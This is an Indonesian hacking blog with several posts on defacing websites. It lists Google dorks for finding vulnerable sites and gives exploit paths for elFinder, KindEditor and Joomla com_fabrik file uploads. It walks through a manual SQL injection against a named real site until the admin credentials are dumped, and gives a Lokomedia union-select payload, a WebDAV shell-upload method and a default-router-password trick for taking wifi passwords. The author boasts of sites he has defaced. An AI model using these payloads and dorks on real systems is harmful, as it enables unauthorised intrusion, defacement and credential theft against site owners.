Popular Posts

Minggu, 04 Desember 2016

Kumpulan Dork Fresh Elfinder

Hallo Euyy, kali ini gw mw berbagi sedikit ilmu yg gw pnya, ok langsung aja gw mw ngasih dork fresh elfinder :D

site:606h.net
site:xx.tn
site:id.ai
site:tuars.co
site:tuars.com
site:tuars.net
site:nazuka.net
site:idwebs.info
site:tom1.net
site:patelhost.com
site:cc.vg
site:ye.vc
site:uk.ht
site:lk6.co
site:bugs3.com
site:3hoo.info
site:smart-hosting.info
site:host78.com
site:allalla.com
site:borazjau.net
Cheat garena site:xx.tn

Nah cman itu aja yg gw pnya klo mw dpt web yg perawan lu kembangin dorknya

Rabu, 23 November 2016

Cara Deface Website Berdomain Dari Nazuka

 Halo kembali dengan saya , kali ini saya akan share cara ngedeface website yang berdomain dari nazuka.Tutorial ini gampang dilakukan dan juga masih banyak yang perawan atau belum di deface oleh orang lain.Ok daripada basa-basi mending saya langsung ke topik nya.

Dork Google :
  • site:id.ai
  • site:nazuka.net
  • site:cc.vg
Kembangin lagi biar banyak website yang perawan hehe :D

1.Cari salah satu websitenya misalkan saya dapat  web ini http://efemuxani.tuars.co.
2.langsung masukan exploit nya /_file-manager/php/connector.php contohnya seperti ini          http://efemuxani.tuars.co/_file-manager/php/connector.php


      Kalo seperti gambar diatas berarti website bisa di deface
3.Copy link tersebut masukan ke revolution.id.ai pastekan ke kolomnya lalu tekan exploit 1 jika gagal klik exploit 2


4.Kalo sudah berhasil langsung masukan /dreblix404.php contohnya seperti ini http://efemuxani.tuars.co/dreblix404.php
5.Setelah itu upload shellnya, lalu masuk ke shell anda  contohnya seperti ini http://efemuxani.tuars.co/NamaShellAnda.php
6.Tinggal tebas Index.php nya
7.Congratulation anda berhasil deface website 

Itu saja yang saya bisa berikan mohon maaf bila ada kesalahan kalo\au anda masih bingung bisa curat-coret di komentar.

Rabu, 09 November 2016

Cara Deface Website Dengan Teknik Web KindEditor

 Hari ini saya mau share tutorial cara deface dengan teknik web kineditor.Teknik ini sangat mudah sekali karena teknik ini cuman upload script deface doang, anak kecil pun bisa melakukan nya masa anda kagak bisa ckckckckkckck.ok simak tutorialnya

1.Masukan dork nya ke search engine seperti google,yahoo,dll
  • inurl:examples/uploadbutton.html
  • inurl:kindeditor
2.Exploit : /path/kindeditor/examples/uploadbutton.html
3.Kalo Sudah dapat web target,klik upload
4.Kemudian masukan script deface
5.Nanti akan keluar hasil upload,copy url tersebut dan masukan ke url
6.Tinggal klik enter
7.Congratulation!!!

Contoh website yang saya Deface dengan teknik kineditor
http://apps.pts80.net/KEditor/attached/file/20161109/20161109172900_31601.html

Kamis, 03 November 2016

Cara Deface Website Dengan Metode Com_Fabrik

Sebelum mulai ke topik saya mau minta maaf karena sudah lama tidak posting di blog ini. Saya juga banyak kesibukan di dunia nyata. Ok tanpa banyak basa-basi lagi,sesuai dengan postigan ini saya akan sharing cara deface website dengan metode com_fabrik.
Langsung aja simak tutorial dibawah ini :

1.Dork : inurl:viewtable.php?cid= site:uk ( dork bisa dikebangin seperti site:bz,br,cz,gr,ru,dll )
2.Setelah itu masukan exploitnya : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3.Contoh website http://ghostshockey.it
4.Buka sitenya dan masukan exploitya http://ghostshockey.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5.Klik piih upload atau Choose File
6.Lalu masukan script deface
7.Tekan import CSV
8.Kalo berhasil langsung masuk ke site http://ghostshockey.it/media/namafilelu.html

Contoh Website yang saya deface :
http://gostsockey.it/media/Ryu404.html

Sekian yang bisa saya deface jika ada yang masih bingung tinggal curcor aja di komen insya allah saya akan bantu.. :D

Sabtu, 29 Oktober 2016

Cara Deface Website Menggunakan SQL Injection Manual

hello, kali ini Saya akan membagikan tutorial cara deface web menggunakan metode SQL Injection MANUAL
apa itu SQL INJECTION .?
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database.
Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url

Contoh : http://situsq.com/berita.php?id=14’
http://situsq.com/berita.php?id=’14
Apabila terlihat pesan error seperti ini :

You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…
dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR, 
Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:
Hackbar
Sekarang kita mulai SQL Injectionnya
Pertama yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: filesize()
“id=” & intext:”Warning: require()
WOW banyak amat -_-, memang banyak sob soalnya dork buat cari target itu ngak cukup 1 dan juga ngak sekali cari ketemu,
Sebenarnya dork itu banyak tapi kemnculan dork-dork baru tergantung kreatifitas individu masing-masing
oke langsung saja Copas ( copy paste ) salah satu dork tersebut ke google search
Setelah itu kita pilih salah satu url dari hasil dork tersebut
contoh :
http://www.zenfocus.com/partners.php?id=2
nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung

teradapat VULN
teradapat VULN
Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
Contoh:
http://www.zenfocus.com/partners.php?id=2 order by 1–  no error
http://www.zenfocus.com/partners.php?id=2 order by 2–  no error
http://www.zenfocus.com/partners.php?id=2 order by 3–  no error
http://www.zenfocus.com/partners.php?id=2 order by 4–  no error
http://www.zenfocus.com/partners.php?id=2 order by 5–  no error
http://www.zenfocus.com/partners.php?id=2 order by 6–  no error
http://www.zenfocus.com/partners.php?id=2 order by 7–  error
eror table ke 7
eror table ke 7
Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6–

Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6–

Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda —
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
bahan post 2
Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=
bahan post 2
dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –>  MySQL –> MySQL CHAR()
bahan post 2
setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok 
sehingga perintah kita menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–
Setelah itu tekan Execute
Dan hasilnya
bahan post 2
Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—
bahan post 2
tekan Execute
dan hasilnya
bahan post 2
Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat soba

Jumat, 21 Oktober 2016

Cara Deface Website Dengan SQL Lokomedia

Hallo blogger, maaf baru ngepost lagi soalnya kesibukan di dunia nyata.Kali ini saya akan ngebahas cara ngedeface website dengan celah/bug yang ada pada cms lokomedia.Berbicara soal teknik ini, pasti sudah tau di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini.


Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html
           - inurl:statis-1-profil.html

           - inurl:statis-2-profil.html

           - inurl:statis-3-strukturorganisasi.html
 
exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+


1.Langsung gunakan dork ke search engine google
2.Kalo sudah dapat targetnya misalnya seperti ini  http://site.com/kategori-23-hiburan.html

3.Masukan explotnya seperti ini http://site.com/kategori-23 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-hiburan.html




4.Kemudian tekan CTRL+U




5.Karena passwordnya masih dakam bentuk md5 maka harus di decrypt,saya menggunakan hashkiller bisa cari di google
6.Kemudian masukan username dan password yg tadi di dapatkan
Untuk login biasanya di :
www.target.c0li/admin
www.target.c0li/adminweb
www.target.c0li/administrator
- www.target.c0li/redaktur

Nah kalo udah masuk berarti anda bisa ngubah apapun,ini hanya untuk sharing tutorial,untuk bertujuan membantu newbie seperti saya

Kamis, 20 Oktober 2016

Mengenal Deface Website

 
 
Deface adalah kegiatan mengubah halaman website orang lain tanpa sepengetahuanorang tersebut pastilanya ini adalah kejahatan dunia cyber. Deface terkenal juga dengan sebutan cybergraditti yaitu corat-coret website tertentu. Deface itu dilakukan dengan memanfaatkan kelemahan dari website tersebut.
Google digunakan sebagai salah satu mesin pencari yang powerfull untuk mencari informasi yang tepat dan akurat. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, terlepas dari tujuan itu baik atau buruk. Di bawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting. Perintah – perintah tersebut antara lain :
1. intitle:
”intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud.
Sebagai contoh pada pencarian, ”intitle: password admin” (tanpa tanda kutip). Pencarian akan mencari page yang mengandung kata ”password” sebagai judulnya dengan prioritas utama ”admin”.
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks ”allintitle:” untuk pencarian secara lengkap. Sebagai contoh pada pencarian ”allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu ”admin” dan ”mdb”.
2. inurl:
”inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl: database mdb”.
Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang ”database mdb”. Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks ”allinurl:” untuk mendapatkan list url tersebut.
Sebagai contoh pencarian ”allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang ”etc” dan ”passwd”. Tanda garis miring slash (/) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
3. site:
”site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: ”waveguide site:ugm.ac.id” (tanpa tanda kutip). Pencarian akan mencari topik tentang waveguide pada semua halaman yang tersedia pada domain ugm.ac.id.
4. cache:
”cache:” akan menunjukkan daftar web yang telah masuk ke dalam indeks database Google, yang berhasil didapatkan oleh Google Crawler. Sebagai contoh:
”cache:detik.com”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page detik.com.
5. filetype:
”filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : ”filetype:pdf” ”Linux Hacking” (tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi ”.pdf” yang mengandung kata Linux dan Hacking.
6. link:
”link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list web pages yang memiliki link pada web page special. Sebagai contoh: ”link:www.detik.com” akan menunjukkan daftar web page yang memiliki point link pada halaman situs Detik.
7. related:
Sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.Sebagai contoh: ”related:www.detik.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Detik.
8. intext:Sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
”intext:admin” (tanpa tanda kutip), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Dengan menggunakan beberapa kata kunci di atas, Google akan menjadi ”pedang” yang bisa dimanfaatkan untuk menggali informasi yang tersembunyi, tak terduga, bahkan sangat penting bagi suatu pihak. Beberapa pihak yang rajin melakukan auditing (pemeriksaan) keamanan suatu sistem melalui jaringan internet biasanya menggunakan google sebagai sarana praktis untuk footprinting (penggalian data sistem yang akan diaudit). Pada kesempatan mendatang, akan kita coba menguak beberapa rahasia yang bisa didapat, hanya dengan google dan kecerdasan otak kanan kita.

Rabu, 19 Oktober 2016

Cara Deface Website Menggunakan Webdav






Kali ini saya akan berbagi cara deface website menggunkan webdav, bagi newbie seperti saya tutor ini mungkin sangat bermanfaat untuk ajang belajar, tutorial ini untuk belajar bukan untuk merusak ataupun menghancurkan website.


  1. Download rootkit dan umer.asp disini
  2. Buka rootkit (Hmei7) lalu klik tab webdav, pilih asp pilih asp shell maker
  3. klik setting dan setelah itu klik Load shell from file
  4. Cari dimana anda ekstrak file Umer.asp lalu open
  5. Setelah itu klik Add site untuk memasukkan alamat website yang menjadi target untuk di deface. Untuk mencari target cari di google menggunakan dork ini inurl:.com/Hmei7.asp;.txt  
  6. Klik tombol serang dan tunggu beberapa saat
  7. Klik "Upload file to..."  klik "choose file", cari file html yang akan kalian upload, lalu "open" setelah itu klik "upload"
  8. Buka file html yg telah kalian upload misal file yg saya upload judulnya "rezpect.txt" 
  9. Buka http://site.name/rezpect.txt. tergantung nama file yg kalian upload.  
 Ini adalah Contoh website yang saya deface



 

Senin, 17 Oktober 2016

Cara Hack Wifi Warnet

cara hack wifi warnet menggunakan client server,Berbicara mengenai ini saya sering mendengar dari kawan-kawan netizen yang penasaran dengan trik membobol wifi.Informasi terbaru kali ini akan mengulas sajian trik membobol / hack password jaringan wifi dengan mudah cepat.Sebelum membobol wifi kita bahas terlebih dahulu tentang wifi,kelebihan dari wifi yaitu tidak perlu menggunakan kabel untuk dapat terhubung dengan jaringan internet.Nah dari kelebihan itu ada kelemahan dari wifi tersebut yaitu mudah terbobol.

pada tutorial kali ini kita akan mengupasnya dengan tuntas tentang bagaimana mengetahhui password tersebut baik menggunakan laptop, smartphone android dan perangkat lainnya, oke langsung saja kita simak caranya seperti di bawah ini.

  • Pertama buka browser seperti mozilla firefox,google crome,opera,dll
  • Nah masukan ip address di url yaitu 192.168.1.1 atau 192.168.100.1
  • Masukan user dan passwornya
192.168.1.1
user : admin
password : admin
192.168.100.1
user : telecomadmin
password : admintelecom
  • Nah kalo udah masuk anda bisa melihat passwor wifinya
Nah itulah tadi beberapa cara yang dapat kita lakukan untuk dapat mengetahui password wifi warnet setelah anda terhubung dengan jaringan tersebut anda bisa melakukan browsing, chatting maupun download lagu atau pun video sesuka anda, oke mungkin itu saja pembahasan kita kali ini semoga dapat bermanfaat dan bagi anda semuanya, selamat mencoba.

Sabtu, 15 Oktober 2016

Cara Mudah Menjadi Hacker

Hacker atau Peretas biasanya identik dengan dunia kejahatan jika memang tidak dimanfaatkan dengan baik. Mereka lebih banyak diam dengan menyembunyikan identitasnya, tapi dibalik itu mereka adalah Seorang Profesional yang tak ingin diketahui oleh orang lain. Di mana Hacker adalah mereka yang mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs, mereka punya etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja. Sedangkan Cracker adalah mereka yang mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan bagi dirinya atau kelompoknya. Hacker sejati bukanlah tipe orang yang mudah menyerah kalah. Mereka memiliki daya juang yang tinggi, dan jarang diantaranya yang bertipe suka pamer kemampuan.

  1. Berpikirlah Seperti Seorang Hacker
Bagaimana seorang hacker berpikir? Apa yang ada di otak seorang hacker? Seorang hacker selalu memikirkan bagaimana caranya menyelesaikan suatu masalah dan bagaimana caranya membuat sesuatu. Seorang hacker juga sangat menghargai kebebasan dan mau menolong dengan sukarela. Kalau ingin menjadi hacker, seseorang harus memiliki attitude ini.
Dunia ini dipenuhi berbagai permasalahan yang sangat menarik untuk diselesaikan. Dengan mencoba menyelesaikan permasalahan-permasalahan ini, seseorang akan mempertajam kemampuan dan melatih kecerdasannya. Ingat juga bahwa suatu permasalahan tidak perlu diselesaikan lebih dari sekali. Oleh karena itu jangan pernah merasa enggan untuk membagikan informasi dan solusi terhadap suatu permasalahan. Ini adalah tanggung jawab moral seorang hacker.
Budaya hacker adalah suatu budaya tentang pengakuan. Seseorang tidak dapat menyebut dirinya sendiri sebagai hacker. Seseorang tidak akan pernah benar-benar menjadi hacker sampai orang lain (para hacker) menyebutnya sebagai hacker. Untuk mendapatkan pengakuan ini tentu saja butuh usaha, kerja keras, dan kontribusi kepada komunitas. Beberapa hal yang dapat dilakukan untuk berkontribusi kepada komunitas:
  • Buatlah perangkat lunak (program) open source.
  • Investasikan waktu luang untuk membantu memperbaiki perangkat lunak open source dengan melakukan debugging.
  • Publikasikan informasi yang berguna.
  • Berikan bantuan untuk menjaga infratstruktur tetap berjalan.
  1. Pelajari Pemrograman
Pelajarilah bagaimana caranya menulis program. Untuk benar-benar menjadi seorang hacker kemampuan pemrograman sangatlah penting. Para hacker menyelesaikan berbagai permasalahan yang mereka temui dengan menulis program. Cara paling mudah untuk mempelajari cara menulis program adalah dengan membaca dokumentasi yang ditulis oleh para masternya. Kemudian cobalah menulis program sedikit demi sedikit. Teruslah berlatih untuk mencapai suatu level kemampuan pemrograman yang cukup baik. Jika sudah cukup percaya diri dengan suatu bahasa pemrograman, cobalah untuk mempelajari bahasa pemrograman lainnya. Mempelajari beberapa bahasa pemrograman akan mengajarkan kita memandang suatu permasalahan dari sisi lain.
  1. Kenali dan Gunakan Unix/Linux
UNIX dan sistem operasi yang mengadopsi konsep yang sama seperti Linux dan BSD adalah sistem operasi utama Internet. Namun untuk menggunakan UNIX seseorang mungkin harus mengeluarkan uang dalam jumlah yang cukup besar. Solusinya adalah menggunakan sistem operasi yang open source seperti GNU/Linux (dengan berbagai pilihan distribusi) dan FreeBSD (dan turunan BSD lainnya). Pelajarilah Linux, gunakan distro yang mudah dan ramah untuk pemula seperti Ubuntu. Pasanglah sistem operasi ini di PC atau laptop dan gunakan untuk bekerja/bermain sehari-hari.
Mungkin sebagian orang akan berpikir mengapa harus menggunakan Unix/Linux/FreeBSD? Apakah tidak bisa menggunakan sistem operasi lain? Sistem operasi tertutup seperti Microsoft Windows dan Mac OS tidak akan mengizinkan seseorang untuk mempelajari kode sumbernya apalagi melakukan modifikasi. Belajar menjadi hacker menggunakan sistem operasi seperti itu ibarat belajar menari dengan tubuh dicor.
  1. Pelajari HTML
HTML adalah mainan hacker yang telah mengubah dunia. Belajarlah bagaimana cara menggunakan World Wide Web dan menulis kode HTML. Menggunakan Word Wide Web bukan berarti sekedar menggunakan browser dan berselancar di dunia maya melainkan bagaimana caranya membangun suatu situs menggunakan bahasa penanda web (web markup language). Cobalah membangun home page menggunakan sintaks-sintaks HTML.

Bagaimana Cara Menjadi Hacker. Caranya adalah sebagai berikut :
  1. Persiapkan Jiwa
Persiapan jiwa ini adalah hal yang paling utama dalam menjadi seorang hacker, adapun hal yang perlu dipersiapkan adalah:
  • Mental dan psikologi: hal ini dibutuhkan karena seorang hacker akan mendapatkan banyak cobaan yang sering kali membuat down dan kadang membuat lupa diri. Seperti caci maki, hinaan, sanjungan dan perkataan manis.
  • Kesabaran, ketabahan dan keikhlasan: hal ini merupakan kunci kesuksesan seorang hacker dimana dengan hal ini akan membuat seorang hacker tidak akan pernah menyesali setiap tindakan yang diperbuat.
  • Semangat, usaha, kemauan, pantang menyerah dan kerja keras: hal ini dibutuhkan seorang hacker untuk berjuang menggapai yang terbaik didalam kehidupan yang dijalani, karena menjadi seorang hacker tidak mudah dan butuh waktu yang cukup untuk memahami setiap seluk beluk ilmu pengetahuan.
  • Percaya dan berserah diri hanya kepada Tuhan Yang Maha Esa: hal ini menjadi pondasi paling penting dan salah satu motto yang digunakan oleh BinusHacker Family yaitu “Tuhan Hanya Engkau Yang Esa” dimana dengan hal ini semua akan dikembalikan kepada Sang Pencipta dan menyatakan bahwa Ilmu Pengetahuan itu Tanpa Batas.
  1. Persiapkan Raga
